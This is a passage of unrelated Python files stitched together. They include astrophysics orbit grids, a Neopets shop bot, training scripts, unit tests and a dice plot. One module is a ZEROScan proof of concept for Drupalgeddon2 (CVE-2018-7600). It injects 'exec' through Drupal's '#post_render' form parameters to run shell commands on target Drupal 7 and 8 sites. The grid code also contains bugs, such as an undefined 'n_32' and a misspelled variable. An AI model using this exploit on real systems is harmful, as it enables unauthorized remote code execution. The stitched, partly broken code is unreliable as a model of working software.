tan(uborders)/scale self.Es = profile_model.potentialr(rs) self.E_borders = profile_model.potentialr(r_borders) epsilon = 0.0001 self.ls = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.l_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.dither = dither self.n_orbits = self.n_I1 * self.n_I2 self.n_cells = self.n_orbits self.order = order if not _issubgrid: #self.mesh = MeshRegularNodal2dLagrange1(self.logrmin, 0, self.logrmax, 1., self.n_I1, self.n_I2) cls = getattr(mab.gd.gdfast, "MeshRegularNodal2dLagrange" + str(self.order)) self.mesh = cls(self.umin, 0, self.umax, 1., self.n_I1, self.n_I2) self.dof = self.mesh.get_dof() self.dof_per_cell = self.mesh.get_dof_per_cell() else: self.mesh = None #self.xmin #self.I1s = self.logrs self.I2s = self.ls if not _issubgrid: self.subgrid = Grid2I_Shaped_InsideTest(light_model, profile_model, rmin, rmax, n_I1*dither, n_I2*dither, dither=1, _issubgrid=True) else: self.subgrid = None def basis(self, i, u, v): return self.mesh.basis_uv(i, u, v) def dof_index(self, xi, yi, i): return self.mesh.dof_index(xi, yi, i) def solve_coordinates(self, inner_products): # system is not orthogonal, solve: M * coordinates = inner_products # where M_i,j = (inner product of basis vectors) coordinates = inner_products * 0 self.mesh.solve_coordinates(inner_products, coordinates) return coordinates def __call__(self, coordinates, logr, l): return self.mesh.eval(coordinates, logr, l) def index_to_orbitnr(self, i1, i2, i3): assert i3 == 0 return i1 + i2 *self.n_I1 # + i2 class Grid3I_Block_Inside(object): def __init__(self, light_model, profile_model, logrmin, logrmax, n_I1, n_I2, n_I3, ditherI1=1, ditherI2=1, ditherI3=1, _issubgrid=False): self.light_model = light_model self.profile_model = profile_model self.logrmin = log10(light_model.arcsec_to_kpc(10**logrmin)) self.logrmax = log10(light_model.arcsec_to_kpc(10**logrmax)) self.n_I1 = n_I1 self.n_I2 = n_I2 self.n_I3 = n_I3 self.logrs = (arange(0, n_I1,dtype=float)+0.5) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.logr_borders = (arange(0, n_I1+1,dtype=float)) / (n_I1) * (self.logrmax-self.logrmin) + self.logrmin self.Es = profile_model.potentialr(10**self.logrs) self.E_borders = profile_model.potentialr(10**self.logr_borders) epsilon = 0.0001 self.lzs = (arange(0, n_I2, dtype=float)+0.5)/n_I2 * (1-2*epsilon) + epsilon self.lz_borders = (arange(0, n_I2+1, dtype=float))/n_I2 * (1-2*epsilon) + epsilon self.i3s = (arange(0, n_I3, dtype=float)+0.5)/n_I3 * (1-2*epsilon) + epsilon self.i3_borders = (arange(0, n_32+1, dtype=float))/n_I3 * (1-2*epsilon) + epsilon self.ditherI1 = ditherI1 self.ditherI2 = ditherI2 self.ditherI3 = ditherI3 self.n_orbits = self.n_I1 * self.n_I2 * self.n_I3 self.dof_per_cell = 1 self.dof = self.n_orbits if not _issubgrid: self.subgrid = Grid3I_Block_Inside(light_model, profile_model, logrmin, logrmax, n_I1*ditherI1, n_I2*ditherI2, n_I3*ditherI3, ditherI1=1, ditherI2=1, ditherI3=1, _issubgrid=True) else: self.subgrid = None def basis(self, i, u, v, w): return 1 def index_to_dof(self, i1, i2, i3, i): return (i1*self.n_I2 + i2) * self.n_I3 + i3 def solve_coordinates(self, inner_products): # system is orthogonal, so inner products are the coordinates themselves return inner_products * 1.0 def index_to_orbitnr(self, i1, i2, i3): #assert i3 == 0 #$return i1*self.n_I2 + i2 return (i1*self.n_I2 + i2) * self.n_I3 + i3 def __call__(self, coordinates, logr, l): return self.mesh.eval(coorinates, logr, l) """:mod:`UserShop` -- Provides an interface for administrating a user shop .. module:: UserShop :synopsis: Provides an interface for administrating a user shop .. moduleauthor:: <> """ from neolib.exceptions import invalidUser from neolib.exceptions import parseException from neolib.inventory.UserShopBackInventory import UserShopBackInventory import logging class UserShop: """Provides an interface for administrating a user shop Provides functionality for loading a user's shop inventory, updating a shop inventory, loading basic shop details, and loading a shop's sales history. Attributes usr (User) -- User that owns the shop name (str) -- Shop name size (str) -- Shop size keeperName(str) -- Shop keeper's name keeperMessage(str) -- Shop keeper's message keeperImg(str) -- Shop keeper's image stock (str) -- Shop stock max (str) -- Max shop stock history (list) -- Shop sales history inventory (UserShopInventory) -- Shop inventory forms (dict) -- All HTML forms on each shop page Example >>> usr.shop.load() >>> usr.shop.inventory['Green Apple'].price = 1000 >>> usr.shop.update() True """ usr = None name = None size = None keeperName = None keeperMessage = None keeperImg = None stock = None max = None history = None inventory = None forms = None def __init__(self, usr): if not usr: raise invalidUser self.usr = usr @property def till(self): """ Queries the current shop till and returns the amount Returns str -- Amount of NPs in shop till Raises parseException """ pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=till") try: return pg.find_all(text = "Shop Till")[1].parent.next_sibling.b.text.replace(" NP", "").replace(",", "") except Exception: logging.getLogger("neolib.shop").exception("Could not grab shop till.", {'pg': pg}) raise parseException def grabTill(self, nps): """ Withdraws given number of NPs from the shop till, returns result Parameters: nps (int) -- Number of NPs to withdraw Returns bool - True if successful, False otherwise """ if not int(nps): return False pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=till") form = pg.form(action="process_market.phtml") form['amount'] = str(nps) form.usePin = True pg = form.submit() # If successful redirects to till page if "You currently have" in pg.content: return True else: logging.getLogger("neolib.shop").exception("Could not grab shop till.", {'pg': pg}) return False def load(self): """ Loads the shop details and current inventory Raises parseException """ pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=your") try: self.name = pg.find_all(text = "Shop Till")[1].parent.parent.parent.previous_sibling.previous_sibling.text self.size = pg.find_all(text = "Shop Till")[1].parent.parent.parent.previous_sibling.split("(size ")[1].replace(")", "") panel = pg.find("img", {"name": "keeperimage"}).parent self.keeperName = panel.b.text.split(" says ")[0] self.keeperMessage = panel.b.text.split(" says ")[1] self.keeperImg = panel.img['src'] self.stock = panel.find_all("b")[1].text self.max = panel.find_all("b")[2].text except Exception: logging.getLogger("neolib.shop").exception("Could not parse shop details.", {'pg': pg}) raise parseException self.inventory = UserShopBackInventory(self.usr, pg) self.forms = self.inventory.forms def loadHistory(self): """ Loads the shop sale history Raises parseException """ pg = self.usr.getPage("http://www.neopets.com/market.phtml?type=sales")\ try: rows = pg.find("b", text = "Date").parent.parent.parent.find_all("tr") # First and last row do not contain entries rows.pop(0) rows.pop(-1) self.history = [] for row in rows: parts = row.find_all("td") dets = {} dets['date'] = parts[0].text dets['item'] = parts[1].text dets['buyer'] = parts[2].text dets['price'] = parts[3].text self.history.append(dets) # Reverse the list to put it in order by date self.history.reverse() except Exception: logging.getLogger("neolib.shop").exception("Could not parse sales history.", {'pg': pg}) raise parseException def update(self): """ Updates the shop inventory, returns result Loops through all pages in the inventory and checks for any changed item on a page. A changed item is identified as the price being different from the original price, or the remove property of the item being set to anything other than 0. Any pages with changed items are updated accordingly. Returns bool - True if successful, false otherwise Raises parseException """ for x in range(1, self.inventory.pages + 1): if self._hasPageChanged(x): form = self._updateForm(x) pg = form.submit() # If successful redirects to shop if "The Marketplace" in pg.content: return True else: logging.getLogger("neolib.shop").exception("Could not verify if prices were updated on user shop.", {'pg': pg}) return False def _itemsOnPage(self, pg): ret = [] for item in self.inventory: if isinstance(item, list): for subItem in item: if subItem.pg == pg: ret.append(subItem) continue if item.pg == pg: ret.append(item) return ret def _hasPageChanged(self, pg): for item in self._itemsOnPage(pg): if item.price != item.oldPrice: return True if item.remove > 0: return True return False def _updateForm(self, pg): if 'remove_all' in self.forms[pg]: del self.forms[pg]['remove_all'] for item in self._itemsOnPage(pg): self.forms[pg]['cost_' + str(item.pos)] = str(item.price) self.forms[pg]['back_to_inv[' + item.id + ']'] = int(item.remove) return self.forms[pg] luismorenolopera/django-rest-framework-json-api import pytest from example.factories import BlogFactory from example.models import Blog pytestmark = pytest.mark.django_db def test_factory_instance(blog_factory): assert blog_factory == BlogFactory def test_model_instance(blog): assert isinstance(blog, Blog) def test_multiple_blog(blog_factory): another_blog = blog_factory(name='Cool Blog') new_blog = blog_factory(name='Awesome Blog') assert another_blog.name == 'Cool Blog' assert new_blog.name == 'Awesome Blog' def test_factories_with_relations(author_factory, entry_factory): author = author_factory(name="") entry = entry_factory( headline=("The Absolute Minimum Every Software Developer" "Absolutely, Positively Must Know About Unicode " "and Character Sets (No Excuses!)"), blog__name='Joel on Software', authors=(author, )) assert entry.blog.name == 'Joel on Software' assert entry.headline == ("The Absolute Minimum Every Software Developer" "Absolutely, Positively Must Know About Unicode " "and Character Sets (No Excuses!)") assert entry.authors.all().count() == 1 assert entry.authors.all()[0].name == '' from paver.easy import sh, task import os @task def build(): if os.path.exists('./build'): sh('rm -rf ./build') script = ''' mkdir ./build cp -rf ./src/* ./build/ (cd ./build; python setup.py sdist bdist_wheel) ''' sh(script) @task def deploy(): script = ''' twine upload ./build/dist/* ''' sh(script) #!/usr/bin/env python3.6 # # run_nemo_model.py # # <> # # Copyright (C) 2019-2021 ETH Zurich, University of Bologna # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # See LICENSE.sw.txt for details. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ @file: run_nemo_model.py @brief Trains a quantized example network with NEMO and exports to RBE @author: () """ import numpy as np import argparse from rbe import RBE from helper_functions import compare_models_numpy import torch import torch.nn as nn import torch.nn.functional as F from torchvision import datasets, transforms import nemo from tqdm import tqdm from matplotlib import pyplot as plt np.set_printoptions(threshold=np.inf) display_active = True # MAIN FUNCTION if __name__ == '__main__': parser = argparse.ArgumentParser(description="Run RBE golden model") ### ### Quantization parameters ### # quantizations of 1bit up to 8-bits possible parser.add_argument("--qw", dest="qw", type=int, default=8, choices=(1, 2, 3, 4, 5, 6, 7, 8), help="HW parameter - activation quantization level (quantizations of 1bit up to 8-bits possible)") # quantizations of 1bit up to 8-bits possible in power-of-two steps parser.add_argument("--qa", dest="qa", type=int, default=8, choices=(1, 2, 3, 4, 5, 6, 7,8), help="HW parameter - activation quantization level (quantizations of 1bit up to 8-bits possible in power-of-two steps)") # quantizations of 1bit up to 8-bits possible in power-of-two steps parser.add_argument("--qao", dest="qao", type=int, default=8, choices=(1, 2, 3, 4, 5, 6, 7, 8), help="HW parameter - activation quantization level (quantizations of 1bit up to 8-bits possible in power-of-two steps)") # quantizations of 1bit up to 8-bits possible in power-of-two steps parser.add_argument("--vverify", dest="verify", type=int, default=1, choices=(0,1), help="Verification - SW golden model is verified with simple golden model") # get arguments args = parser.parse_args() # Define the Network class ExampleNet(nn.Module): def __init__(self): super(ExampleNet, self).__init__() self.conv1 = nn.Conv2d(1, 32, 3, 1) self.bn1 = nn.BatchNorm2d(32) self.relu1 = nn.ReLU() # <== Module, not Function! self.conv2 = nn.Conv2d(32, 64, 3, 2) self.bn2 = nn.BatchNorm2d(64) self.relu2 = nn.ReLU() # <== Module, not Function! self.fc1 = nn.Linear(9216, 256) self.fcrelu1 = nn.ReLU() # <== Module, not Function! self.fc2 = nn.Linear(256, 10) def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.relu1(x) # <== Module, not Function! x = self.conv2(x) x = self.bn2(x) x = self.relu2(x) # <== Module, not Function! x = torch.flatten(x, 1) x = self.fc1(x) x = self.fcrelu1(x) # <== Module, not Function! x = self.fc2(x) output = F.log_softmax(x, dim=1) # <== the softmax operation does not need to be quantized, we can keep it as it is return output # Define Metric class Metric(object): def __init__(self, name): self.name = name self.sum = torch.tensor(0.) self.n = torch.tensor(0.) def update(self, val): self.sum += val.cpu() self.n += 1 @property def avg(self): return self.sum / self.n # Define Training Method def train(model, device, train_loader, optimizer, epoch, verbose=True): model.train() train_loss = Metric('train_loss') with tqdm(total=len(train_loader), desc='Train Epoch #{}'.format(epoch + 1), disable=not verbose) as t: for batch_idx, (data, target) in enumerate(train_loader): data, target = data.to(device), target.to(device) optimizer.zero_grad() output = model(data) loss = F.nll_loss(output, target) loss.backward() optimizer.step() train_loss.update(loss) t.set_postfix({'loss': train_loss.avg.item()}) t.update(1) return train_loss.avg.item() # Define Test Method def test(model, device, test_loader, integer=False, verbose=True): model.eval() test_loss = 0 correct = 0 test_acc = Metric('test_acc') with tqdm(total=len(test_loader), desc='Test', disable=not verbose) as t: with torch.no_grad(): for data, target in test_loader: if integer: # <== this will be useful when we get to the data *= 255 # IntegerDeployable stage data, target = data.to(device), target.to(device) output = model(data) test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability correct += pred.eq(target.view_as(pred)).sum().item() test_acc.update((pred == target.view_as(pred)).float().mean()) t.set_postfix({'acc' : test_acc.avg.item() * 100. }) t.update(1) test_loss /= len(test_loader.dataset) return test_acc.avg.item() * 100. # Configure GPU device = torch.device("cuda" if torch.cuda.is_available() else "cpu") kwargs = {'num_workers': 1, 'pin_memory': True} if torch.cuda.is_available() else {} # Load MNIST data loader train_loader = torch.utils.data.DataLoader( datasets.MNIST('../data', train=True, download=True, transform=transforms.Compose([ transforms.ToTensor() ])), batch_size=128, shuffle=True, **kwargs ) test_loader = torch.utils.data.DataLoader( datasets.MNIST('../data', train=False, transform=transforms.Compose([ transforms.ToTensor() ])), batch_size=128, shuffle=False, **kwargs ) # Download the trained full-precision model model = ExampleNet().to(device) try: state_dict = torch.load("mnist_cnn_fp.pt", map_location='cpu') except FileNotFoundError: import os os.system("wget https://raw.githubusercontent.com/FrancescoConti/nemo_examples_helper/master/mnist_cnn_fp.pt") state_dict = torch.load("mnist_cnn_fp.pt", map_location='cpu') model.load_state_dict(state_dict, strict=True) acc = test(model, device, test_loader) print("\nFullPrecision accuracy: %.02f%%" % acc) # example mixed precision model = nemo.transform.quantize_pact(model, dummy_input=torch.randn((1,1,28,28)).to(device)) # TODO note asymetric training, therewore weight bits reduced by 1 precision = { 'conv1': { 'W_bits' : args.qw-1, 'x_bits' : args.qa }, 'conv2': { 'W_bits' : args.qw-1 }, 'fc1': { 'W_bits' : args.qw-1 }, 'fc2': { 'W_bits' : args.qw-1 }, 'relu1': { 'x_bits' : args.qao }, 'relu2': { 'x_bits' : args.qao }, 'fcrelu1': { 'x_bits' : args.qao }, } model.change_precision(bits=1, min_prec_dict=precision) acc = test(model, device, test_loader) # Deployable setup model = nemo.transform.bn_quantizer(model) model.harden_weights() model.set_deployment(eps_in=1./255) acc = test(model, device, test_loader) print("\nQuantizedDeployable @ mixed-precision accuracy: %.02f%%" % acc) # Integerize Model model = nemo.transform.integerize_pact(model, eps_in=1.0/255) acc = test(model, device, test_loader, integer=True) print("\nIntegerDeployable @ mixed-precision accuracy: %.02f%%" % acc) ##### export to RBE # Generate sample input data from MNIST dataset correct = 0 total = 0 sample = 2 # id within the dataset sample_image = test_loader.dataset.data[sample, :, :] sample_image = np.reshape(sample_image, (1,1,28,28)).float() sample_expclass = test_loader.dataset.targets[sample] if display_active: plt.imshow(sample_image[0,0,:,:]) plt.show() # Take small part of image for fast illustration sample_image_small = sample_image[0:1, 0:1, 0:5, 0:5] # Init RBE with nemo and create stimuli rbe = RBE.init_from_nemo(list(layers)[0][1], list(layers)[1][1], list(layers)[2][1], sample_image_small) rbe.print_overview() # run golden model and bittrue model rbe.run_bittrue_shifted_network(verify_model=True) # compare golden model with actual nemo output compare_models_numpy(rbe.y_golden, rbe.y_nemo, display_active) import argparse import os import shutil import time import glob import numpy as np import torch import torch.nn.parallel import torch.utils.data import torch.utils.data.distributed from src.datasets.image_loaders import get_image_loader from src.utils import mkdir, save_object, cprint, load_object from src.probability import depth_categorical_VI from src.DUN.training_wrappers import DUN_VI from src.DUN.stochastic_img_resnets import resnet18, resnet34, resnet50, resnet101 parser = argparse.ArgumentParser(description='PyTorch ImageNet Training') parser.add_argument('--dataset', type=str, default='MNIST', choices=["CIFAR10", "CIFAR100", "SVHN", "MNIST", "Fashion"], help='dataset to train (default: MNIST)') parser.add_argument('--data_dir', type=str, default='../data/', help='directory where datasets are saved (default: ../data/)') parser.add_argument('-j', '--workers', default=4, type=int, help='number of data loading workers (default: 4)') parser.add_argument('--epochs', default=None, type=int, help='number of total epochs to run (if None, use dataset default)') parser.add_argument('-wd', '--weight_decay', default=1e-4, type=float, help='weight decay (default: 1e-4)') parser.add_argument('--savedir', default='./results/', type=str, help='path where to save checkpoints (default: ./results/)') parser.add_argument('--resume', default='', type=str, help='path to latest checkpoint (default: none)') parser.add_argument('--gpu', default=0, type=int, help='GPU id to use. (default: 0)') parser.add_argument('--batch_size', default=256, type=int, help='Batch size to use. (default: 256)') parser.add_argument('--model', type=str, default='resnet50', choices=["resnet18", "resnet32", "resnet50", "resnet101"], help='model to train (default: resnet50)') parser.add_argument('--start_depth', default=1, type=int, help='first layer to be uncertain about (default: 1)') parser.add_argument('--end_depth', default=13, type=int, help='last layer to be uncertain about + 1 (default: 13)') parser.add_argument('--q_nograd_its', default=0, type=int, help='number of warmup epochs (where q is not learnt) (default: 0)') best_err1 = 1 lr = 0.1 momentum = 0.9 def main(args): dataset = args.dataset workers = args.workers epochs = args.epochs weight_decay = args.weight_decay resume = args.resume savedir = args.savedir gpu = args.gpu q_nograd_its = args.q_nograd_its batch_size = args.batch_size data_dir = args.data_dir start_depth = args.start_depth end_depth = args.end_depth model = args.model os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu) savedir += "/" + "_".join([dataset, model, "DUN", f"warm{q_nograd_its}", f"{start_depth}-{end_depth}"]) savedir += "_wd" if weight_decay != 0 else "_nowd" num = len(glob.glob(savedir + "*")) savedir += f"_{num}" epoch_dict = { 'Imagenet': 90, 'SmallImagenet': 90, 'CIFAR10': 300, 'CIFAR100': 300, 'SVHN': 90, 'Fashion': 90, 'MNIST': 90 } milestone_dict = { 'Imagenet': [30, 60], # This is pytorch default 'SmallImagenet': [30, 60], 'CIFAR10': [150, 225], 'CIFAR100': [150, 225], 'SVHN': [50, 70], 'Fashion': [40, 70], 'MNIST': [40, 70] } if epochs is None: epochs = epoch_dict[dataset] milestones = milestone_dict[dataset] initial_conv = '3x3' if dataset in ['Imagenet', 'SmallImagenet'] else '1x3' input_chanels = 1 if dataset in ['MNIST', 'Fashion'] else 3 if dataset in ['Imagenet', 'SmallImagenet']: num_classes = 1000 elif dataset in ['CIFAR100']: num_classes = 100 else: num_classes = 10 if model == 'resnet18': model_class = resnet18 elif model == 'resnet18': model_class = resnet34 elif model == 'resnet50': model_class = resnet50 elif model == 'resnet101': model_class = resnet101 else: raise Exception('requested model not implemented') cuda = torch.cuda.is_available() print('cuda', cuda) assert cuda n_layers = end_depth - start_depth prior_probs = [1 / (n_layers)] * (n_layers) prob_model = depth_categorical_VI(prior_probs, cuda=cuda) model = model_class(arch_uncert=True, start_depth=start_depth, end_depth=end_depth, num_classes=num_classes, zero_init_residual=True, initial_conv=initial_conv, concat_pool=False, input_chanels=input_chanels, p_drop=0) N_train = 0 net = DUN_VI(model, prob_model, N_train, lr=lr, momentum=momentum, weight_decay=weight_decay, cuda=cuda, schedule=milestones, regression=False, pred_sig=None) train_loop(net, dname=dataset, data_dir=data_dir, epochs=epochs, workers=workers, resume=resume, savedir=savedir, q_nograd_its=q_nograd_its, batch_size=batch_size) def train_loop(net, dname, data_dir, epochs=90, workers=4, resume='', savedir='./', save_all_epochs=False, q_nograd_its=0, batch_size=256): mkdir(savedir) global best_err1 # Load data here: _, train_loader, val_loader, _, _, Ntrain = \ get_image_loader(dname, batch_size, cuda=True, workers=workers, distributed=False, data_dir=data_dir) net.N_train = Ntrain start_epoch = 0 marginal_loglike = np.zeros(epochs) train_loss = np.zeros(epochs) dev_loss = np.zeros(epochs) err_train = np.zeros(epochs) err_dev = np.zeros(epochs) # optionally resume from a checkpoint if resume: if os.path.isfile(resume): print("=> loading checkpoint '{}'".format(resume)) start_epoch, best_err1 = net.load(resume) print("=> loaded checkpoint '{}' (epoch {})" .format(resume, start_epoch)) else: print("=> no checkpoint found at '{}'".format(resume)) candidate_progress_file = resume.split('/') candidate_progress_file = '/'.join(candidate_progress_file[:-1]) + '/stats_array.pkl' if os.path.isfile(candidate_progress_file): print("=> found progress file at '{}'".format(candidate_progress_file)) try: marginal_loglike, err_train, train_loss, err_dev, dev_loss = \ load_object(candidate_progress_file) print("=> Loaded progress file at '{}'".format(candidate_progress_file)) except Exception: print("=> Unable to load progress file at '{}'".format(candidate_progress_file)) else: print("=> NOT found progress file at '{}'".format(candidate_progress_file)) if q_nograd_its > 0: net.prob_model.q_logits.requires_grad = False for epoch in range(start_epoch, epochs): if q_nograd_its > 0 and epoch == q_nograd_its: net.prob_model.q_logits.requires_grad = True tic = time.time() nb_samples = 0 for x, y in train_loader: marg_loglike_estimate, minus_loglike, err = net.fit(x, y) marginal_loglike[epoch] += marg_loglike_estimate * x.shape[0] err_train[epoch] += err * x.shape[0] train_loss[epoch] += minus_loglike * x.shape[0] nb_samples += len(x) marginal_loglike[epoch] /= nb_samples train_loss[epoch] /= nb_samples err_train[epoch] /= nb_samples toc = time.time() # ---- print print('\n depth approx posterior', net.prob_model.current_posterior.data.cpu().numpy()) print("it %d/%d, ELBO/evidence %.4f, pred minus loglike = %f, err = %f" % (epoch, epochs, marginal_loglike[epoch], train_loss[epoch], err_train[epoch]), end="") cprint('r', ' time: %f seconds\n' % (toc - tic)) net.update_lr() # ---- dev tic = time.time() nb_samples = 0 for x, y in val_loader: minus_loglike, err = net.eval(x, y) dev_loss[epoch] += minus_loglike * x.shape[0] err_dev[epoch] += err * x.shape[0] nb_samples += len(x) dev_loss[epoch] /= nb_samples err_dev[epoch] /= nb_samples toc = time.time() cprint('g', ' pred minus loglike = %f, err = %f\n' % (dev_loss[epoch], err_dev[epoch]), end="") cprint('g', ' time: %f seconds\n' % (toc - tic)) filename = 'checkpoint.pth.tar' if save_all_epochs: filename = str(epoch) + '_' + filename net.save(os.path.join(savedir, filename), best_err1) if err_dev[epoch] < best_err1: best_err1 = err_dev[epoch] cprint('b', 'best top1 dev err: %f' % err_dev[epoch]) shutil.copyfile(os.path.join(savedir, filename), os.path.join(savedir, 'model_best.pth.tar')) all_results = [marginal_loglike, err_train, train_loss, err_dev, dev_loss] save_object(all_results, os.path.join(savedir, 'stats_array.pkl')) if __name__ == '__main__': args = parser.parse_args() main(args) charliealpha094/Project_Data_Visualization0 #Done by (21/07/2020) #Try 15.7 - Three Dice """ When you roll three D6 dice, the smallest number you can roll is 3 and the largest number is 18. Create a visualization that shows what hap- pens when you roll three D6 dice. """ from plotly.graph_objs import Bar, Layout from plotly import offline from dice import Die #Create three D6 dices. die_1 = Die() die_2 = Die() die_3 = Die() #Make some rolls, and store the results in a list. results = [] for roll_num in range(500): result = die_1.roll() + die_2.roll() + die_3.roll() results.append(result) #Analyse the results frequencies = [] max_result = die_1.num_sides + die_2.num_sides + die_3.num_sides for value in range (3, max_result+1): frequency = results.count(value) frequencies.append(frequency) #Visualize the results x_values = list(range(3, max_result+1)) data = [Bar(x=x_values, y=frequencies)] x_axis_config = {'title': 'Result', 'dtick': 1} y_axis_config = {'title': 'Frequency of Result'} my_layout = Layout(title='Results of rolling three D6 dice 1000 times.', xaxis=x_axis_config, yaxis=y_axis_config) offline.plot({'data': data, 'layout': my_layout}, filename='D6_D6_D6.html')mehrdad-shokri/ZEROScan10-100 #!/usr/bin/env python # -*- coding:utf-8 -*- from thirdparty import requests from bs4 import BeautifulSoup import random import string import sys import base64 import urllib def expInfo(): expInfo={} expInfo["appName"] = "Drupal" expInfo["appVersion"] = "Drupal < 7.58" expInfo["author"] = "Z3r0yu" expInfo["description"] = "PoC for testing Drupalgeddon2 (CVE-2018-7600) vulnerability. Works for Drupal 7 and Drupal 8." expInfo["references"] = "https://github.com/0ang3el/drupalgeddon2" expInfo["options"] = [ { "Name": "URL", "Current Setting": "", "Required": True, "Description": "URL or URL file" }, { "Name": "Thread", "Current Setting": "1", "Required": False, "Description": "Threads" }, { "Name": "Cookie", "Current Setting": "", "Required": False, "Description": "cookie" }, { "Name": "Report", "Current Setting": "", "Required": False, "Description": "do you need a html report?" }, ] return expInfo requests.packages.urllib3.disable_warnings() def get_random_string(len=20): return ''.join([random.choice(string.ascii_letters) for _ in range(len)]) def check_vulnerable_8(base_url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = get_random_string() cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r))) url = base_url + '/user/register?element_parents=timezone/timezone/%23value&ajax_form=1' data = 'form_id=user_register_form&_drupal_ajax=1&timezone[#post_render][]=exec&timezone[#markup]={0}'.format(cmd) resp = requests.post(url, data, headers=headers, verify=False) if r in str(resp.content): return True return False def check_vulnerable_7(base_url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = get_random_string() cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r))) url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format(cmd) data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value=' resp = requests.post(url, data, headers=headers, verify=False) if resp.status_code != 200: return False soup = BeautifulSoup(resp.content, 'lxml') form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value') url = base_url + '/file/ajax/name/%23value/' + form_build_id data = 'form_build_id={0}'.format(form_build_id) resp = requests.post(url, data, headers=headers, verify=False) if r in str(resp.content): return True return False # target like http://ip/ def exploit(target, headers=None): vulnerable1 = check_vulnerable_7(target) vulnerable2 = check_vulnerable_8(target) if vulnerable1: result = 'Drupal 7 target `{0}` is vulnerable !'.format(target) elif vulnerable2: result = 'Drupal 8 target `{0}` is vulnerable bingo!!!'.format(target) else: result = 'Target {0} seems not vulnerable to Drupalgeddon 2.'.format(target) return result10-100 # -*- encoding: utf-8 -*- import mock import pytest from six import b, text_type as u, binary_type from wykop.api.exceptions.resolvers import ExceptionResolver class MockStdout(object): def __init__(self, encoding=None): if encoding is not None: self.encoding = encoding class TestExceptionResolverInit(object): def test_initialized(self): exceptions = mock.sentinel.exceptions resolver = ExceptionResolver(exceptions) assert resolver.exceptions == exceptions class TestExceptionResolverGetClass(object): def test_existing(self, exception_resolver): code, klass = list(exception_resolver.exceptions.items())[0] test_class = type('TestException', (object,), {}) result = exception_resolver.get_class(code, test_class) assert result == klass assert result != test_class def test_default(self, exception_resolver): code = 999 test_class = type('TestException', (object,), {}) result = exception_resolver.get_class(code, test_class) assert result == test_class class TestExceptionResolverGetMessage(object): @pytest.mark.parametrize('message, expected', [ (u'\u0105\u015b\u017c\u017amessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), (b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), ]) @mock.patch('sys.stdout', MockStdout()) def test_no_stdout_encoding(self, message, expected, exception_resolver): result = exception_resolver.get_message(message) assert type(result) == binary_type assert result == expected @pytest.mark.parametrize('message, expected', [ (u'\u0105\u015b\u017c\u017amessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), (b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), ]) @mock.patch('sys.stdout', MockStdout('utf-8')) def test_stdout_encoding(self, message, expected, exception_resolver): result = exception_resolver.get_message(message) assert type(result) == binary_type assert result == expected class TestExceptionResolverResolve(object): @mock.patch.object(ExceptionResolver, 'get_message') @mock.patch.object(ExceptionResolver, 'get_class') def test_resolved( self, mocked_get_class, mocked_get_message, exception_resolver): code = mock.sentinel.code msg = mock.sentinel.msg default_class = mock.sentinel.default_class klass = type('TestClass', (object,), {'__init__': lambda x, y: None}) message = mock.sentinel.message mocked_get_class.return_value = klass mocked_get_message.return_value = message result = exception_resolver.resolve(code, msg, default_class) mocked_get_class.assert_called_once_with(code, default_class) mocked_get_message.assert_called_once_with(msg) assert type(result) == klass # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import mock from openstack.smn.v2 import _proxy from openstack.smn.v2 import message_template as _message_template from openstack.smn.v2 import subscription as _subscription from openstack.smn.v2 import topic as _topic from openstack.tests.unit import test_proxy_base2 class TestSMNProxy(test_proxy_base2.TestProxyBase): def setUp(self): super(TestSMNProxy, self).setUp() self.proxy = _proxy.Proxy(self.session) def test_create_topic(self): self.verify_create(self.proxy.create_topic, _topic.Topic) def test_topics(self): self.verify_list(self.proxy.topics, _topic.Topic) def test_delete_topic(self): self.verify_delete(self.proxy.delete_topic, _topic.Topic, True) def test_get_topic(self): self.verify_get(self.proxy.get_topic, _topic.Topic) def test_update_topic(self): self.verify_update(self.proxy.update_topic, _topic.Topic) def test_get_topic_attr(self): topic = '123' self.verify_list(self.proxy.get_topic_attr, _topic.TopicAttr, paginated=False, method_args=[topic], expected_kwargs={'topic_urn': topic}) def test_update_topic_attr(self): topic_attr_dict = {'topic_urn': 'fakeurn'} topic_attr = _topic.TopicAttr(**topic_attr_dict) attrname = 'attr' value = 'val' self._verify2('openstack.proxy2.BaseProxy._update', self.proxy.update_topic_attr, method_args=[topic_attr, attrname, value], expected_args=[mock.ANY, topic_attr], expected_kwargs={'topic_urn': 'fakeurn', 'attributes_name': attrname, 'attr_value': value}) def 